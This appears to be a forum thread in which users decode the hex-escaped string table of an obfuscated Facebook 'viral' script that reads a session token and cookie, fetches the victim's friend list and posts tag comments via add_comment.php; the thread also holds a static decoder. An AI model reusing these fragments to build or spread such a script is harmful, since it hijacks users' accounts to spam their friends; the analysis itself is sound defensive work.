[Question] How to "translate" these codes into text

Started by fortil, November 08, 2014, 01:16:51 PM


November 08, 2014, 01:16:51 PM Last edit: November 08, 2014, 03:00:38 PM by blackdrake
Hi, it turns out I was given a script that is useful for a few things (posting on FB), but it comes with its malice, and it is completely encoded, I think in ASCII and hex. The problem is that decoding it has been quite a challenge, and I would like to know if there is any way to decode it.

This is part of what I was sent.
Code: text

var _0x2e14=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x32\x34\x30\x33\x30\x30\x37\x34\x36\x31\x34\x38\x39\x36\x30","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x61\x72\x6B\x61\x64\x61\x73\x6C\x61\x72\x20\x3D\x20","\x66\x6F\x72\x20\x28\x3B\x3B\x29\x3B","","\x72\x65\x70\x6C\x61\x63\x65","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x3B","\x6C\x65\x6E\x67\x74\x68","\x65\x6E\x74\x72\x69\x65\x73","\x70\x61\x79\x6C\x6F\x61\x64","\x72\x6F\x75\x6E\x64","\x20\x40\x5B","\x75\x69\x64","\x3A","\x74\x65\x78\x74","\x5D","\x20","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72","\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79","\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D","\x26\x74\x6F\x6B\x65\x6E\x3D\x76\x37","\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F","\x69\x6E\x64\x65\x78\x4F\x66","\x55\x52\x4C","\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x73\x65\x6E\x64","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x26\x66\x74\x5F\x65\x6E\x74\x5F\x69\x64\x65\x6E\x74\x69\x66\x69\x65\x72\x3D","\x26\x63\x6F\x6D\x6D\x65\x6E\x74\x5F\x74\x65\x78\x74\x3D","\x26\x73\x6F\x75\x72\x63\x65\x3D\x32","\x26\x63\x6C\x69\x65\x6E\x74\x5F\x69\x64\x3D\x31\x33\x37\x37\x38\x37\x31\
x37\x39\x37\x31\x33\x38\x3A\x31\x37\x30\x37\x30\x31\x38\x30\x39\x32","\x26\x72\x65\x70\x6C\x79\x5F\x66\x62\x69\x64","\x26\x70\x61\x72\x65\x6E\x74\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x5F\x69\x64","\x26\x72\x6F\x6F\x74\x69\x64\x3D\x75\x5F\x6A\x73\x6F\x6E\x70\x5F\x32\x5F\x33","\x26\x63\x6C\x70\x3D\x7B\x22\x63\x6C\x5F\x69\x6D\x70\x69\x64\x22\x3A\x22\x34\x35\x33\x35\x32\x34\x61\x30\x22\x2C\x22\x63\x6C\x65\x61\x72\x63\x6F\x75\x6E\x74\x65\x72\x22\x3A\x30\x2C\x22\x65\x6C\x65\x6D\x65\x6E\x74\x69\x64\x22\x3A\x22\x6A\x73\x5F\x35\x22\x2C\x22\x76\x65\x72\x73\x69\x6F\x6E\x22\x3A\x22\x78\x22\x2C\x22\x70\x61\x72\x65\x6E\x74\x5F\x66\x62\x69\x64\x22\x3A","\x7D","\x26\x61\x74\x74\x61\x63\x68\x65\x64\x5F\x73\x74\x69\x63\x6B\x65\x72\x5F\x66\x62\x69\x64\x3D\x30","\x26\x61\x74\x74\x61\x63\x68\x65\x64\x5F\x70\x68\x6F\x74\x6F\x5F\x66\x62\x69\x64\x3D\x30","\x26\x67\x69\x66\x74\x6F\x63\x63\x61\x73\x69\x6F\x6E","\x26\x66\x74\x5B\x74\x6E\x5D\x3D\x5B\x5D","\x26\x5F\x5F\x61\x3D\x31","\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x33\x35\x79\x6E\x78\x6C\x32\x75\x35\x46\x39\x37\x4B\x65\x70\x45\x73\x79\x6F","\x26\x5F\x5F\x72\x65\x71\x3D\x71","\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x74\x74\x73\x74\x61\x6D\x70\x3D","\x50\x4F\x53\x54","\x2F\x61\x6A\x61\x78\x2F\x75\x66\x69\x2F\x61\x64\x64\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x2E\x70\x68\x70","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65"];

var _0xa22c=[_0x2e14[0],_0x2e14[1],_0x2e14[2],_0x2e14[3],_0x2e14[4],_0x2e14[5],_0x2e14[6],_0x2e14[7],_0x2e14[8],_0x2e14[9],_0x2e14[10],_0x2e14[11],_0x2e14[12],_0x2e14[13],_0x2e14[14],_0x2e14[15],_0x2e14[16],_0x2e14[17],_0x2e14[18],_0x2e14[19],_0x2e14[20],_0x2e14[21],_0x2e14[22],_0x2e14[23],_0x2e14[24],_0x2e14[25],_0x2e14[26],_0x2e14[27],_0x2e14[28],_0x2e14[29],_0x2e14[30],_0x2e14[31],_0x2e14[32],_0x2e14[33],_0x2e14[34],_0x2e14[35],_0x2e14[36],_0x2e14[37],_0x2e14[38],_0x2e14[39],_0x2e14[40],_0x2e14[41],_0x2e14[42],_0x2e14[43],_0x2e14[44],_0x2e14[45],_0x2e14[46],_0x2e14[47],_0x2e14[48],_0x2e14[49],_0x2e14[50],_0x2e14[51],_0x2e14[52],_0x2e14[53],_0x2e14[54],_0x2e14[55],_0x2e14[56],_0x2e14[57],_0x2e14[58],_0x2e14[59],_0x2e14[60],_0x2e14[61],_0x2e14[62],_0x2e14[63],_0x2e14[64]];


Nasty guy, isn't he? Thanks.

Hmmm, I think it's shellcode, but I don't know how many bits there are in there...


As I told you on IRC, with this page you can go on decoding it manually.
That is for the first var; the second one just takes the values from the first array.

Regards

November 08, 2014, 01:35:01 PM #3 Last edit: November 08, 2014, 01:38:29 PM by Snifer
Fortil, check hex(), bin(), str(); there you have your answer for decoding.

As for telling which is which: regular expressions.


Regards,
Snifer


They call the person who kept the forum from going down a traitor, stupid people!
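
Added example (not part of any post in this thread): a static decoder for the kind of string table shown in the first post, covering both replies above: it decodes the `\xNN` escapes with a regular expression and then resolves the `name[N]` references that the second array is built from. The function names and the short `SAMPLE` (with table names `_0x1a` and `_0x2b`) are constructed for illustration; the decoder also assumes that a line break inside a literal is a copy/paste hard wrap, as in the pasted sample.

```javascript
// Added example: static decoder for a hex-escaped string-table obfuscation.
// The sample is handled as text only; nothing from it is eval'd or executed.
const SIMPLE = { n: "\n", r: "\r", t: "\t" };

// Decode the escapes inside one string-literal body.
function decodeEscapes(body) {
  // Assumption: raw line breaks inside a literal are copy/paste hard wraps.
  const joined = body.replace(/\r?\n/g, "");
  return joined.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})|\\([\s\S])/g,
    (m, hex, uni, ch) => {
      if (hex || uni) return String.fromCharCode(parseInt(hex || uni, 16));
      return ch in SIMPLE ? SIMPLE[ch] : ch; // \" and \\ keep the character
    });
}

// Read `var NAME=["...","..."]` and return the decoded strings by index.
function extractTable(source, name) {
  const decl = source.indexOf("var " + name);
  if (decl < 0) throw new Error("table not found: " + name);
  const token =
    /\s*(?:"((?:[^"\\]|\\[\s\S])*)"|'((?:[^'\\]|\\[\s\S])*)')\s*(,|\])/y;
  token.lastIndex = source.indexOf("[", decl) + 1;
  const out = [];
  for (let m; (m = token.exec(source)); ) {
    out.push(decodeEscapes(m[1] !== undefined ? m[1] : m[2]));
    if (m[3] === "]") return out; // closing bracket outside any string
  }
  throw new Error("unterminated or non-literal table: " + name);
}

// Replace every NAME[N] reference with the decoded literal it points to.
function inlineRefs(source, name, table) {
  const ref = new RegExp(name.replace(/\$/g, "\\$&") + "\\[(\\d+)\\]", "g");
  return source.replace(ref, (m, i) =>
    Number(i) < table.length ? JSON.stringify(table[Number(i)]) : m);
}

// Constructed sample in the same shape as the pasted script, including a
// hard wrap in the middle of an escape.
const SAMPLE = String.raw`var _0x1a=["\x76\x61\x6C\x75\x65","\x63\x6F\x6F\x6B\x69\x65","\x50\x4F\x53\
x54"];
var _0x2b=[_0x1a[0],_0x1a[2]];`;

const table = extractTable(SAMPLE, "_0x1a");
table.forEach((s, i) => console.log(i, JSON.stringify(s)));
console.log(inlineRefs(SAMPLE, "_0x1a", table).split("\n").pop());
```

Printing each entry with its index keeps the strings separate, which makes the later `name[N]` lookups in the rest of a script readable.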



I don't know if this will help you, but I'll leave it here.

Code: text

valuefb_dtsggetElementsByNamematchcookie240300746148960onreadystatechangereadyStatearkadaslar = for (;;);replaceresponseText;lengthentriespayloadround @[uid:text] &filter[0]=user&options[0]=friends_only&options[1]=nm&token=v7&viewer=&__user=https://indexOfURLGEThttps://www.facebook.com/ajax/typeahead/first_degree.php?__a=1openhttp://www.facebook.com/ajax/typeahead/first_degree.php?__a=1sendrandomfloor&ft_ent_identifier=&comment_text=&source=2&client_id=1377871797138:1707018092&reply_fbid&parent_comment_id&rootid=u_jsonp_2_3&clp={"cl_impid":"453524a0","clearcounter":0,"elementid":"js_5","version":"x","parent_fbid":}&attached_sticker_fbid=0&attached_photo_fbid=0&giftoccasion&ft[tn]=[]&__a=1&__dyn=7n8ahyj35ynxl2u5F97KepEsyo&__req=q&fb_dtsg=&ttstamp=POST/ajax/ufi/add_comment.phpContent-typeapplication/x-www-form-urlencodedsetRequestHeaderstatusclose


Regards, HomeGuard

fortil, I don't know if you have any idea what that is; it's part of a Facebook viral code.

Regards!